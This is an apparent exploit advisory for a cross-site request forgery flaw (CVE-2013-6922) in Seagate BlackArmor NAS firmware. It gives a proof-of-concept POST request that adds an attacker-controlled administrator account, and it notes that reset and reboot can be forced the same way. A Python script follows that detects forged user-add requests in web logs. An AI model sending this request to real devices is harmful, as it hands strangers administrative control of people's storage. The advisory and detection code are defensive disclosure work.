Seagate BlackArmor NAS Cross Site Request Forgery

2014.01.06
Risk: Low
Local: No
Remote: Yes
CWE: CWE-352


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: Seagate BlackArmor NAS - Cross Site Request Forgery
# Google Dork: N/A
# Date: 04-01-2014
# Exploit Author: Jeroen - IT Nerdbox
# Vendor Homepage: http://www.seagate.com/
# Software Link: http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/
# Version: sg2000-2000.1331
# Tested on: N/A
# CVE : CVE-2013-6922
#
## Description:
#
# Multiple CSRF attacks are possible; the proof of concept shows how a user with
# administrative privileges can be added to the system.
#
# It is also possible to:
#
# 1. Factory reset the device
# 2. Reboot the device
# 3. Add/Edit/Remove users
# 4. Add/Edit/Remove shares and volumes
#
# This vulnerability was reported to Seagate in September 2013; they stated that it will not be fixed.
#
## Proof of Concept:
#
# POST: http(s)://<url | ip>/admin/access_control_user_add.php?lang=en&gi=a001&fbt=23
# Parameters:
#
# username         attacker
# adminright       yes
# fullname         hacker
# userpasswd       attackers_password
# userpasswdcheck  attackers_password
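Since the vendor declined to fix this, the practical defence is to keep the admin interface off untrusted networks and to watch the web-access log for forged submissions to the user-add page. The following is an added detection example, not code from the advisory or from Seagate: it parses constructed Apache "combined" log lines (assumed to carry the virtual host as the first field) and flags POSTs to the endpoint named above whose Referer is absent or points to a different host.

```python
import re
from urllib.parse import urlsplit

# Constructed sample log lines (not captured from a real device). Format:
# vhost client ident user [time] "request" status bytes "referer" "user-agent"
SAMPLE_LOG = """\
nas.local 10.0.0.5 - - [04/Jan/2014:10:00:01 +0100] "POST /admin/access_control_user_add.php?lang=en&gi=a001&fbt=23 HTTP/1.1" 200 512 "https://nas.local/admin/access_control_user_add.php?lang=en" "Mozilla/5.0"
nas.local 10.0.0.5 - - [04/Jan/2014:10:05:42 +0100] "POST /admin/access_control_user_add.php?lang=en&gi=a001&fbt=23 HTTP/1.1" 200 512 "http://evil.example/lure.html" "Mozilla/5.0"
nas.local 10.0.0.5 - - [04/Jan/2014:10:06:10 +0100] "POST /admin/access_control_user_add.php?lang=en&gi=a001&fbt=23 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
nas.local 10.0.0.5 - - [04/Jan/2014:10:07:00 +0100] "GET /admin/access_control_user_add.php?lang=en HTTP/1.1" 200 2048 "http://evil.example/" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<vhost>\S+) (?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# State-changing admin page named in the advisory. The text says reboot,
# factory reset and share management are affected too, but gives no paths,
# so only this endpoint is listed.
SENSITIVE_POST_PATHS = ("/admin/access_control_user_add.php",)

def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def is_suspect_csrf(entry):
    """True for a POST to a sensitive admin page with no Referer, or with a
    Referer whose host differs from the virtual host that served the request."""
    if entry["method"] != "POST":
        return False
    path = entry["path"].split("?", 1)[0]
    if path not in SENSITIVE_POST_PATHS:
        return False
    referer = entry["referer"]
    if referer in ("", "-"):
        return True  # a same-site form submission normally carries a Referer
    return urlsplit(referer).hostname != entry["vhost"]

def find_suspect_posts(log_text):
    """Return (time, client, referer) for every flagged request."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry and is_suspect_csrf(entry):
            hits.append((entry["time"], entry["client"], entry["referer"]))
    return hits

if __name__ == "__main__":
    for hit in find_suspect_posts(SAMPLE_LOG):
        print("possible CSRF user-add:", hit)
```

A missing Referer is flagged as well because a lure page can suppress it, so this is an alert rule rather than proof of forgery. It only detects after the fact; preventing the attack requires anti-CSRF tokens or Origin checks in the firmware itself.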

References:

http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/

